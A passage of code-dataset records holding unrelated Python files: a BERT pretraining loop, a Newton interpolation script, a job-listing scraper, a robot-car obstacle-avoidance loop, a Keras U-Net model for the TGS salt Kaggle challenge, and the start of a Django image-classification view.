print(\"Data_iter Over\")\n\n model = BertModel4Pretrain(model_cfg,data_iter.word_tot)\n criterion1 = nn.CrossEntropyLoss(reduction='none')\n criterion2 = nn.CrossEntropyLoss()\n\n optimizer = optim.optim4GPU(cfg, model, data_iter.one_epoch_step * cfg.n_epochs)\n trainer = train.Trainer(cfg, model, data_iter, None, optimizer, save_dir, get_device())\n\n writer = SummaryWriter(log_dir=log_dir) # for tensorboardX\n\n def get_loss(model, batch, global_step): # make sure loss is tensor\n #input_ids, segment_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next = batch\n input_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next = batch\n\n #logits_lm, logits_clsf = model(input_ids, segment_ids, input_mask, masked_pos)\n logits_lm = model(input_ids, input_mask, masked_pos)\n loss_lm = criterion1(logits_lm.transpose(1, 2), masked_ids) # for masked LM\n loss_lm = (loss_lm*masked_weights.float()).mean()\n #loss_clsf = criterion2(logits_clsf, is_next) # for sentence classification\n writer.add_scalars('data/scalar_group',\n {'loss_lm': loss_lm.item(),\n #'loss_clsf': loss_clsf.item(),\n #'loss_total': (loss_lm + loss_clsf).item(),\n 'lr': optimizer.get_lr()[0],\n },\n global_step)\n #return loss_lm + loss_clsf\n return loss_lm\n print(\"Start training\")\n for cur_epoch in range(cfg.n_epochs):\n trainer.train(get_loss, model_file, None, data_parallel)\n print(\"{} epoch is Done\".format(cur_epoch))\n\n\nif __name__ == '__main__':\n 
fire.Fire(main)\n","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":13415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"463120639","text":"xs = eval(input(\"Ingrese los x: \"))\nys = eval(input(\"Ingrese los y: \"))\n\np = []\nb = []\n\nresult = str(ys[0])\nb.append(ys[0]) \np.append(eval(\"lambda x: \"+result))\nb.append((ys[1]-b[0])/(xs[1]-xs[0]))\nresult += f\"+{b[1]}*(x-{xs[0]})\"\np.append(eval(\"lambda x: \"+result))\n\nfor n in range(2,len(ys)):\n fun = p[n-1]\n den = 1\n coef = \"\"\n for i in xs[:n]:\n den *= (xs[n]-i)\n coef += f\"(x-{i})*\"\n coef = coef[:len(coef)-1]\n b.append((ys[n] - fun(xs[n]))/den)\n result += f\"+{b[n]}*{coef}\"\n p.append(eval(\"lambda x: \"+result))\n\nprint(\"Interpolante Newton (sin diferencias divididas)\")\nprint()\nprint(\"Resultados:\")\nprint()\nprint(\"Coeficientes del polinomio:\")\nprint()\nfor i in b:\n print(i)\nprint()\nprint(\"Polinomio:\")\nprint()\nprint(result) \n\n","sub_path":"analisis_numerico/simple_scripts/interpolanteNewton.py","file_name":"interpolanteNewton.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"634954202","text":"import requests\r\nimport math\r\n\r\n\r\nclass jobinfo(object):\r\n def __init__(self, jobname, city):\r\n self.jobname = jobname\r\n self.city = city\r\n self.lurl = \"http://www.lagou.com/jobs/positionAjax.json?city=%s&needAddtionalResult=false\" % self.city\r\n self.headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\"}\r\n\r\n def get_pn(self):\r\n pn = 1\r\n post_data = {\r\n \"first\": \"false\",\r\n \"pn\": str(pn),\r\n \"kd\": self.jobname\r\n }\r\n fjson = requests.post(self.lurl, headers=self.headers, data=post_data).json()\r\n total = fjson['content']['positionResult']['totalCount']\r\n pn = math.ceil(total / 15)\r\n return pn\r\n\r\n def get_json(self):\r\n pn = self.get_pn()\r\n jsonlist = []\r\n for i in range(1, pn + 1):\r\n post_data = {\r\n \"first\": \"false\",\r\n \"pn\": str(i),\r\n \"kd\": self.jobname\r\n }\r\n ojson = requests.post(self.lurl, headers=self.headers, data=post_data).json()\r\n jsonlist.append(ojson)\r\n return jsonlist\r\n\r\n def get_info(self):\r\n jsonlist = self.get_json()\r\n job = {}\r\n job_id = []\r\n company = []\r\n salary = []\r\n district = []\r\n workyear = []\r\n education = []\r\n positionname = []\r\n positionAdvantage = []\r\n industryField = []\r\n createTime = []\r\n jobnature = []\r\n companySize = []\r\n companyLabelList = []\r\n financeStage = []\r\n for fjson in jsonlist:\r\n result = fjson['content']['positionResult']['result']\r\n for i in result:\r\n jobid = i['positionId']\r\n jcompany = i['companyShortName']\r\n jsalary = i['salary']\r\n jdistrict = i['district']\r\n jworkyear = i['workYear']\r\n jeducation = i['education']\r\n jpositionname = i['positionName']\r\n jpositionAdvantage = i['positionAdvantage']\r\n jjobnature = i['jobNature']\r\n jindustryField = i['industryField']\r\n jcreateTime = i['createTime']\r\n jcompanySize = i['companySize']\r\n jfinanceStage = i['financeStage']\r\n jcompanyLabelList = i['companyLabelList']\r\n company.append(jcompany)\r\n salary.append(jsalary)\r\n district.append(jdistrict)\r\n workyear.append(jworkyear)\r\n education.append(jeducation)\r\n positionname.append(jpositionname)\r\n 
positionAdvantage.append(jpositionAdvantage)\r\n                industryField.append(jindustryField)\r\n                createTime.append(jcreateTime)\r\n                jobnature.append(jjobnature)\r\n                companySize.append(jcompanySize)\r\n                financeStage.append(jfinanceStage)\r\n                companyLabelList.append(jcompanyLabelList)\r\n                job_id.append(jobid)\r\n\r\n        # the dict keys below are the original Chinese labels (company, salary, district, city, ...)\r\n        job['jobid'] = job_id\r\n        job['公司'] = company\r\n        job['薪资'] = salary\r\n        job['地区'] = district\r\n        job['城市'] = self.city\r\n        job['工作年限'] = workyear\r\n        job['教育经历'] = education\r\n        job['职位'] = positionname\r\n        job['职位诱惑'] = positionAdvantage\r\n        job['工作方式'] = jobnature\r\n        job['领域'] = industryField\r\n        job['发布时间'] = createTime\r\n        job['公司规模'] = companySize\r\n        job['公司印象'] = companyLabelList\r\n        job['公司状况'] = financeStage\r\n        print('工作部分信息获取完毕')  # 'job information retrieval finished'\r\n        return job\r\n\r\n","sub_path":"lagou1/jobinfo.py","file_name":"jobinfo.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"539200038","text":"#########################################################################\n# 20171618 Dong_Seola 's code\n# this start_run_right.py file is the executable code\n#########################################################################\n\n# =======================================================================\n# define your variables and set each value\n# eg) dis and obstacle\n# =======================================================================\n\ndis = 17 #20\nobstacle = 0 # how many times the car has met an obstacle\n\n# Swing Turn's angle\nSwingPr1 = 50\nSwingTr1 = 0.4\n# Point Turn's angle\nSwingPr2 = 30\nSwingTr2 = 0.4\n# The speed that the executor wants\nspeed = 43\n\n# =======================================================================\n# import GPIO library and time module\n# =======================================================================\nimport RPi.GPIO as GPIO\nimport time\n\n# =======================================================================\n# set up GPIO mode as BOARD\n# set GPIO warnings as false\n# =======================================================================\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\n# =======================================================================\n# import the getDistance() method from the high_came module\n# =======================================================================\nimport high_came\n\n#getDistance()\n\n# =======================================================================\n# import swing_point method\n# =======================================================================\nimport swing_point_turn\n\n#left_motor(x) #right_motor(x) - set right and left motor to move\n#rightSwingTurn(speed, runningtime) - right wheel stops\n#leftSwingTurn(speed, runningtime) - left wheel stops\n#rightPointTurn(speed, runningtime) - right wheel goes backward\n#leftPointTurn(speed, runningtime) - left wheel goes backward\n\n# =======================================================================\n# import go_forward_any(), go_backward_any(), stop(), LeftPwm(),\n# RightPwm(), pwm_setup(), and pwm_low() methods in the module of go_any\n# =======================================================================\nimport for_back_ward\n\n#leftmotor(x) #rightmotor(x) - set right and left motor to move\n#go_forward_any(speed) - go forward while other stimulation\n#go_backward_any(speed) - go backward while other stimulation\n#go_forward(speed, running_time) - go forward while running time\n#go_backward(speed, running_time) - go backward while running time\n\n#pwm_setup() - get pwm 0 both wheel\n#pwm_low() - if there is unexpected occurrence\n#stop() - get pwm to stop\n\n# =======================================================================\n# set up and initialize the left motor and right motor\n# =======================================================================\n\nfor_back_ward.pwm_setup()\n\n# ========================================================================\n# perform the run with the imported helpers\n# eg) go forward/backward and turn (swing, point)\n# ========================================================================\n\ntry:\n    while True:\n        # the ultrasonic sensor returns the measured distance\n        distance = high_came.getDistance()\n        print('distance= ', distance)\n\n        # when the distance is above dis, move the object forward\n        if (distance > dis):\n            if obstacle == 0 or obstacle == 1:\n                for_back_ward.go_forward_any(speed)\n                print('obstacle=', obstacle)\n            else:\n                for_back_ward.go_forward(speed, 2)\n\n        # when the distance is below dis\n        else:\n            # stop and wait 1 second\n            for_back_ward.stop()\n            time.sleep(1)\n            # Swing right turn\n            if obstacle == 0:\n                swing_point_turn.rightSwingTurn(SwingPr1, SwingTr1)\n                time.sleep(1)\n                obstacle += 1\n            # Point right turn\n            elif obstacle == 1:\n                swing_point_turn.rightPointTurn(SwingPr2, SwingTr2)\n                time.sleep(1)\n                obstacle += 1\n\n\n# when the Ctrl+C key has been pressed,\n# the moving object will be stopped\nexcept KeyboardInterrupt:\n    for_back_ward.pwm_low()\n","sub_path":"창업연계/3륜차 구동/원본/start_run_right.py","file_name":"start_run_right.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"440638752","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 12 08:00:54 2018\n\n@author: neha\n\n5 fold - same as model 11\n\"\"\"\n\n\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\nfrom sacred.utils import apply_backspaces_and_linefeeds\n\nex = Experiment(\"TGsalt\", interactive=True)\nex.observers.append(MongoObserver.create(url='127.0.0.1:27017', db_name='kaggle_TGSalt'))\nex.captured_out_filter = apply_backspaces_and_linefeeds\n\n@ex.config\ndef my_config():\n    epochs = 200\n    batch_size = 32\n    start_neurons_arg = 24\n    dropout_arg = 0.05\n    train_mask_threshold = 0.5\n    lr_arg = 0.008\n    exp_notes = \"Unet with resnet and se blocks on folds. 
Similar to 2\"\n\n@ex.capture\ndef my_metrics(_run, logs):\n print(logs.get('val_my_iou_metric'))\n _run.log_scalar(\"loss\", float(logs.get('loss')))\n _run.log_scalar(\"acc\", float(logs.get('acc')))\n _run.log_scalar(\"val_loss\", float(logs.get('val_loss')))\n _run.log_scalar(\"val_acc\", float(logs.get('val_acc')))\n _run.log_scalar(\"my_iou_metric\", float(logs.get('my_iou_metric')))\n _run.log_scalar(\"val_my_iou_metric\", float(logs.get('val_my_iou_metric')))\n _run.result = float(logs.get('val_my_iou_metric'))\n\n@ex.automain\ndef my_main(batch_size, epochs, start_neurons_arg, dropout_arg, train_mask_threshold, lr_arg):\n import os\n import sys\n import random\n import pandas as pd\n import numpy as np\n import matplotlib.pyplot as plt\n plt.style.use('seaborn-white')\n import seaborn as sns\n sns.set_style(\"white\")\n from sklearn.model_selection import train_test_split\n from itertools import chain\n from skimage.io import imread, imshow, concatenate_images\n from skimage.transform import resize \n from keras.models import Model, load_model\n from keras.layers import Input,Dropout,BatchNormalization,Activation,Add,Multiply\n from keras.layers.core import Lambda, Dense\n from keras.layers.convolutional import Conv2D, Conv2DTranspose\n from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D\n from keras.layers.merge import concatenate\n from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, Callback, LearningRateScheduler\n from keras import backend as K\n from keras.optimizers import Adam, SGD\n import time \n import tensorflow as tf\n import h5py\n from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img #,save_img\n \n # Set some parameters\n im_width = 101\n im_height = 101\n im_chan = 1\n basicpath = '/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/'\n path_train = basicpath + 'train/'\n path_test = basicpath + 'test/'\n \n path_train_images = path_train + 'images/'\n path_train_masks = path_train + 'masks/'\n path_test_images = path_test + 'images/'\n \n img_size_ori = 101\n img_size_target = 101\n \n def upsample(img):# not used\n if img_size_ori == img_size_target:\n return img\n return resize(img, (img_size_target, img_size_target), mode='constant', preserve_range=True)\n #res = np.zeros((img_size_target, img_size_target), dtype=img.dtype)\n #res[:img_size_ori, :img_size_ori] = img\n #return res\n \n def downsample(img):# not used\n if img_size_ori == img_size_target:\n return img\n return resize(img, (img_size_ori, img_size_ori), mode='constant', preserve_range=True)\n #return img[:img_size_ori, :img_size_ori]\n \n # Loading of training/testing ids and depths\n def cov_to_class(val): \n for i in range(0, 11):\n if val * 10 <= i :\n return i\n \n def BatchActivate(x):\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x\n \n def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n if activation==True: x = BatchActivate(x)\n return x\n \n def residual_block(blockInput, num_filters=16, batch_activate=False):\n x = BatchActivate(blockInput)\n x = convolution_block(x, num_filters, (3,3))\n x = convolution_block(x, num_filters, (3,3), activation=False)\n x = Add()([x, blockInput])\n if batch_activate: x = BatchActivate(x)\n return x\n \n def se_block(in_block, ch, ratio=16):\n x = GlobalAveragePooling2D()(in_block)\n x = Dense(ch//ratio, activation='relu')(x)\n x = Dense(ch, 
activation='sigmoid')(x)\n return Multiply()([in_block, x])\n # Build Model\n def build_model(input_layer, start_neurons, DropoutRatio=0.5):\n # 101 -> 50\n conv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(input_layer)\n conv1 = residual_block(conv1, start_neurons*1)\n conv1 = se_block(conv1, start_neurons*1)\n conv1 = residual_block(conv1, start_neurons*1, True)\n conv1 = se_block(conv1, start_neurons*1)\n pool1 = MaxPooling2D((2,2))(conv1)\n pool1 = Dropout(DropoutRatio/2)(pool1)\n \n # 50 -> 25\n conv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(pool1)\n conv2 = residual_block(conv2, start_neurons*2)\n conv2 = se_block(conv2, start_neurons*2)\n conv2 = residual_block(conv2, start_neurons*2, True)\n conv2 = se_block(conv2, start_neurons*2)\n pool2 = MaxPooling2D((2,2))(conv2)\n pool2 = Dropout(DropoutRatio)(pool2)\n \n # 25 -> 12\n conv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(pool2)\n conv3 = residual_block(conv3, start_neurons*4)\n conv3 = se_block(conv3, start_neurons*4)\n conv3 = residual_block(conv3, start_neurons*4, True)\n conv3 = se_block(conv3, start_neurons*4)\n pool3 = MaxPooling2D((2,2))(conv3)\n pool3 = Dropout(DropoutRatio)(pool3)\n \n # 12 -> 6\n conv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(pool3)\n conv4 = residual_block(conv4, start_neurons*8)\n conv4 = se_block(conv4, start_neurons*8)\n conv4 = residual_block(conv4, start_neurons*8, True)\n conv4 = se_block(conv4, start_neurons*8)\n pool4 = MaxPooling2D((2,2))(conv4)\n pool4 = Dropout(DropoutRatio)(pool4)\n \n # Middle\n convm = Conv2D(start_neurons*16, (3,3), activation=None, padding='same')(pool4)\n convm = residual_block(convm, start_neurons*16)\n convm = se_block(convm, start_neurons*16)\n convm = residual_block(convm, start_neurons*16, True)\n convm = se_block(convm, start_neurons*16)\n\n # 6 -> 12\n deconv4 = Conv2DTranspose(start_neurons*8, (3,3), strides=(2,2), padding='same')(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(DropoutRatio)(uconv4)\n \n uconv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(uconv4)\n uconv4 = residual_block(uconv4, start_neurons*8)\n uconv4 = se_block(uconv4, start_neurons*8)\n uconv4 = residual_block(uconv4, start_neurons*8, True)\n uconv4 = se_block(uconv4, start_neurons*8)\n \n # 12 -> 25\n deconv3 = Conv2DTranspose(start_neurons*4, (3,3), strides=(2,2), padding='valid')(uconv4)\n uconv3 = concatenate([deconv3, conv3])\n uconv3 = Dropout(DropoutRatio)(uconv3)\n \n uconv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(uconv3)\n uconv3 = residual_block(uconv3, start_neurons*4)\n uconv3 = se_block(uconv3, start_neurons*4)\n uconv3 = residual_block(uconv3, start_neurons*4, True)\n uconv3 = se_block(uconv3, start_neurons*4)\n \n # 25 -> 50\n deconv2 = Conv2DTranspose(start_neurons*2, (3,3), strides=(2,2), padding='same')(uconv3)\n uconv2 = concatenate([deconv2, conv2])\n uconv2 = Dropout(DropoutRatio)(uconv2)\n \n uconv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(uconv2)\n uconv2 = residual_block(uconv2, start_neurons*2)\n uconv2 = se_block(uconv2, start_neurons*2)\n uconv2 = residual_block(uconv2, start_neurons*2, True)\n uconv2 = se_block(uconv2, start_neurons*2)\n \n # 50 -> 101\n deconv1 = Conv2DTranspose(start_neurons*1, (3,3), strides=(2,2), padding='valid')(uconv2)\n uconv1 = concatenate([deconv1, conv1])\n uconv1 = Dropout(DropoutRatio)(uconv1)\n \n uconv1 = Conv2D(start_neurons*1, (3,3), 
activation=None, padding='same')(uconv1)\n uconv1 = residual_block(uconv1, start_neurons*1)\n uconv1 = se_block(uconv1, start_neurons*1)\n uconv1 = residual_block(uconv1, start_neurons*1, True)\n uconv1 = se_block(uconv1, start_neurons*1)\n \n output_layer_noActi = Conv2D(1, (1,1), padding='same', activation=None)(uconv1)\n output_layer = Activation('sigmoid')(output_layer_noActi)\n \n return output_layer\n \n #Score the model and do a threshold optimization by the best IoU.\n \n # src: https://www.kaggle.com/aglotero/another-iou-metric\n def iou_metric(y_true_in, y_pred_in, print_table=False):\n labels = y_true_in\n y_pred = y_pred_in\n \n true_objects = 2\n pred_objects = 2\n \n # Jiaxin fin that if all zeros, then, the background is treated as object\n temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=([0,0.5,1], [0,0.5, 1]))\n #temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=(true_objects, pred_objects))\n #print(temp1)\n intersection = temp1[0]\n #print(\"temp2 = \",temp1[1])\n #print(intersection.shape)\n #print(intersection)\n #Compute areas (needed for finding the union between all objects)\n #print(np.histogram(labels, bins = true_objects))\n area_true = np.histogram(labels,bins=[0,0.5,1])[0]\n #print(\"area_true = \",area_true)\n area_pred = np.histogram(y_pred, bins=[0,0.5,1])[0]\n area_true = np.expand_dims(area_true, -1)\n area_pred = np.expand_dims(area_pred, 0)\n \n # Compute union\n union = area_true + area_pred - intersection\n \n # Exclude background from the analysis\n intersection = intersection[1:,1:]\n intersection[intersection == 0] = 1e-9\n \n union = union[1:,1:]\n union[union == 0] = 1e-9\n \n # Compute the intersection over union\n iou = intersection / union\n \n # Precision helper function\n def precision_at(threshold, iou):\n matches = iou > threshold\n true_positives = np.sum(matches, axis=1) == 1 # Correct objects\n false_positives = np.sum(matches, axis=0) == 0 # Missed objects\n false_negatives = np.sum(matches, axis=1) == 0 # Extra objects\n tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)\n return tp, fp, fn\n \n # Loop over IoU thresholds\n prec = []\n if print_table:\n print(\"Thresh\\tTP\\tFP\\tFN\\tPrec.\")\n for t in np.arange(0.5, 1.0, 0.05):\n tp, fp, fn = precision_at(t, iou)\n if (tp + fp + fn) > 0:\n p = tp / (tp + fp + fn)\n else:\n p = 0\n if print_table:\n print(\"{:1.3f}\\t{}\\t{}\\t{}\\t{:1.3f}\".format(t, tp, fp, fn, p))\n prec.append(p)\n \n if print_table:\n print(\"AP\\t-\\t-\\t-\\t{:1.3f}\".format(np.mean(prec)))\n return np.mean(prec)\n \n def iou_metric_batch(y_true_in, y_pred_in):\n batch_size = y_true_in.shape[0]\n metric = []\n for batch in range(batch_size):\n value = iou_metric(y_true_in[batch], y_pred_in[batch])\n metric.append(value)\n return np.mean(metric)\n \n def my_iou_metric(label, pred):\n metric_value = tf.py_func(iou_metric_batch, [label, pred> train_mask_threshold], tf.float64)\n return metric_value\n \n def iou_metric_batch_2(y_true_in, y_pred_in):\n ## Scoring for last model, choose threshold by validation data \n thresholds_ori = np.linspace(0.3, 0.7, 31)\n # Reverse sigmoid function: Use code below because the sigmoid activation was removed\n thresholds = np.log(thresholds_ori/(1-thresholds_ori)) \n ious = np.array([iou_metric_batch(y_true_in, y_pred_in > threshold) for threshold in thresholds])\n return ious.max()\n \n def my_iou_metric_2(label, pred):\n return tf.py_func(iou_metric_batch_2, [label, pred], tf.float64)\n \n class 
LogMetrics(Callback):\n def on_epoch_end(self, _, logs={}):\n my_metrics(logs=logs)\n \n def jaccard_distance_loss(y_true, y_pred):\n \"\"\"\n Jaccard = (|X & Y|)/ (|X|+ |Y| - |X & Y|)\n = sum(|A*B|)/(sum(|A|)+sum(|B|)-sum(|A*B|))\n \n The jaccard distance loss is usefull for unbalanced datasets. This has been\n shifted so it converges on 0 and is smoothed to avoid exploding or disapearing\n gradient.\n \n Ref: https://en.wikipedia.org/wiki/Jaccard_index\n \n @url: https://gist.github.com/wassname/f1452b748efcbeb4cb9b1d059dce6f96\n @author: wassname\n \"\"\"\n smooth=100\n intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n sum_ = K.sum(K.abs(y_true) + K.abs(y_pred), axis=-1)\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\n return (1 - jac) * smooth\n \n\n # code download from: https://github.com/bermanmaxim/LovaszSoftmax\n def lovasz_grad(gt_sorted):\n \"\"\"\n Computes gradient of the Lovasz extension w.r.t sorted errors\n See Alg. 1 in paper\n \"\"\"\n gts = tf.reduce_sum(gt_sorted)\n intersection = gts - tf.cumsum(gt_sorted)\n union = gts + tf.cumsum(1. - gt_sorted)\n jaccard = 1. - intersection / union\n jaccard = tf.concat((jaccard[0:1], jaccard[1:] - jaccard[:-1]), 0)\n return jaccard\n \n # --------------------------- BINARY LOSSES ---------------------------\n \n def lovasz_hinge(logits, labels, per_image=True, ignore=None):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\n per_image: compute the loss per image instead of per batch\n ignore: void class id\n \"\"\"\n if per_image:\n def treat_image(log_lab):\n log, lab = log_lab\n log, lab = tf.expand_dims(log, 0), tf.expand_dims(lab, 0)\n log, lab = flatten_binary_scores(log, lab, ignore)\n return lovasz_hinge_flat(log, lab)\n losses = tf.map_fn(treat_image, (logits, labels), dtype=tf.float32)\n loss = tf.reduce_mean(losses)\n else:\n loss = lovasz_hinge_flat(*flatten_binary_scores(logits, labels, ignore))\n return loss\n \n def lovasz_hinge_flat(logits, labels):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\n labels: [P] Tensor, binary ground truth labels (0 or 1)\n ignore: label to ignore\n \"\"\"\n \n def compute_loss():\n labelsf = tf.cast(labels, logits.dtype)\n signs = 2. * labelsf - 1.\n errors = 1. 
- logits * tf.stop_gradient(signs)\n errors_sorted, perm = tf.nn.top_k(errors, k=tf.shape(errors)[0], name=\"descending_sort\")\n gt_sorted = tf.gather(labelsf, perm)\n grad = lovasz_grad(gt_sorted)\n loss = tf.tensordot(tf.nn.elu(errors_sorted), tf.stop_gradient(grad), 1, name=\"loss_non_void\")\n return loss\n \n # deal with the void prediction case (only void pixels)\n loss = tf.cond(tf.equal(tf.shape(logits)[0], 0),\n lambda: tf.reduce_sum(logits) * 0.,\n compute_loss,\n strict=True,\n name=\"loss\"\n )\n return loss\n \n \n def flatten_binary_scores(scores, labels, ignore=None):\n \"\"\"\n Flattens predictions in the batch (binary case)\n Remove labels equal to 'ignore'\n \"\"\"\n scores = tf.reshape(scores, (-1,))\n labels = tf.reshape(labels, (-1,))\n if ignore is None:\n return scores, labels\n valid = tf.not_equal(labels, ignore)\n vscores = tf.boolean_mask(scores, valid, name='valid_scores')\n vlabels = tf.boolean_mask(labels, valid, name='valid_labels')\n return vscores, vlabels\n \n def lovasz_loss(y_true, y_pred):\n y_true, y_pred = K.cast(K.squeeze(y_true, -1), 'int32'), K.cast(K.squeeze(y_pred, -1), 'float32')\n #logits = K.log(y_pred / (1. - y_pred))\n logits = y_pred #Jiaxin\n loss = lovasz_hinge(logits, y_true, per_image = True, ignore = None)\n return loss\n\n train_df = pd.read_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train.csv\", index_col=\"id\", usecols=[0])\n depths_df = pd.read_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/depths.csv\", index_col=\"id\")\n train_df = train_df.join(depths_df) \n len(train_df)\n \n train_df[\"images\"] = [np.array(load_img(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train/images/{}.png\".format(idx), grayscale=True)) / 255 for idx in train_df.index]\n train_df[\"masks\"] = [np.array(load_img(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train/masks/{}.png\".format(idx), grayscale=True)) / 255 for idx in train_df.index]\n train_df[\"coverage\"] = train_df.masks.map(np.sum) / pow(img_size_ori, 2)\n \n train_df[\"coverage_class\"] = train_df.coverage.map(cov_to_class)\n \n # trainng for one fold\n fold = 0\n t_fold = pd.Series.from_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train_fold_\"+str(fold)+\".csv\")\n v_fold = pd.Series.from_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/valid_fold_\"+str(fold)+\".csv\")\n\n #Data augmentation\n x_train = np.array(train_df[train_df.index.isin(t_fold.values)].images.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n y_train = np.array(train_df[train_df.index.isin(t_fold.values)].masks.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n x_valid = np.array(train_df[train_df.index.isin(v_fold.values)].images.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n y_valid = np.array(train_df[train_df.index.isin(v_fold.values)].masks.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n\n #Data augmentation\n x_train2 = np.concatenate((x_train, [np.fliplr(x) for x in x_train]), axis=0)\n y_train2 = np.concatenate((y_train, [np.fliplr(x) for x in y_train]), axis=0)\n print(x_train2.shape)\n print(y_valid.shape)\n \n\n # model\n input_layer = Input((img_size_target, img_size_target, 1))\n output_layer = build_model(input_layer, start_neurons_arg, dropout_arg)\n \n model = Model(input_layer, output_layer)\n \n #c = Adam(lr = lr_arg)\n c = SGD(lr=lr_arg, momentum=0.9, decay=0.0001, nesterov=False)\n\n model.compile(loss=\"binary_crossentropy\", optimizer=c, 
metrics=[my_iou_metric, 'accuracy'])\n \n model.summary()\n save_model_name = \"unet_resent_12_fold\"+str(fold)+\".model\" \n early_stopping = EarlyStopping(monitor='val_my_iou_metric', mode = 'max',patience=15, verbose=1)\n model_checkpoint = ModelCheckpoint(save_model_name, monitor='val_my_iou_metric', mode='max',\n save_best_only=True, verbose=1)\n \n reduce_lr = ReduceLROnPlateau(monitor='val_my_iou_metric', mode='max', factor=0.5, patience=5,\n min_lr=0.000001, verbose=1)\n \n t_model1_start = time.time()\n model.fit(x_train2, y_train2,\n validation_data=[x_valid, y_valid], \n epochs=epochs,\n batch_size=batch_size,\n callbacks=[early_stopping, model_checkpoint, reduce_lr, LogMetrics()], \n verbose=2)\n t_model1_end = time.time()\n print(f\"Run time = {(t_model1_end-t_model1_start)/3600} hours\")\n\n \"\"\"\n save_model_name = \"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/models/unet_resent_12_fold\"+str(fold)+\".model\"\n \n # retrain using other loss\n model = load_model(save_model_name, custom_objects={'my_iou_metric':my_iou_metric, 'jaccard_distance_loss': jaccard_distance_loss})\n # remove activation layer and use lovasz loss\n input_x = model.layers[0].input\n \n output_layer = model.layers[-1].input\n model = Model(input_x, output_layer)\n c = Adam(lr=0.01)\n \n model.compile(loss=lovasz_loss, optimizer=c, metrics=[my_iou_metric_2, 'accuracy', my_iou_metric])\n \n model.summary()\n save_model_name = \"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/models/unet_resent_12_hl_fold\"+str(fold)+\".model\" \n\n early_stopping = EarlyStopping(monitor='val_my_iou_metric_2', mode = 'max',patience=30, verbose=1)\n model_checkpoint = ModelCheckpoint(save_model_name,monitor='val_my_iou_metric_2', \n mode = 'max', save_best_only=True, verbose=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_my_iou_metric_2', mode = 'max',factor=0.5, patience=5, \n min_lr=0.00005, verbose=1)\n epochs = 120\n batch_size = 128\n \n t_model2_start = time.time()\n history = model.fit(x_train, y_train,\n validation_data=[x_valid, y_valid], \n epochs=epochs,\n batch_size=batch_size,\n callbacks=[ model_checkpoint,reduce_lr,early_stopping, LogMetrics()], \n verbose=2)\n t_model2_end = time.time()\n print(f\"Run time = {(t_model2_end-t_model2_start)/3600} hours\")\n \"\"\"","sub_path":"TGSsalt/models/model_12.py","file_name":"model_12.py","file_ext":"py","file_size_in_byte":22088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493120854","text":"from django.shortcuts import render, redirect\nfrom .forms import ImageForm\nfrom .models import Image\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n\n images = Image.objects.all()\n if len(images) == 1:\n delete_image = Image.objects.all()\n delete_image.delete()\n \n image = form.save(commit=False)\n image.save()\n images = Image.objects.all()\n image_path = images[0].image\n top_3, percent= run_inference_on_image(str(image_path))\n\n car_name_list, car_type_list, car_producer_list, 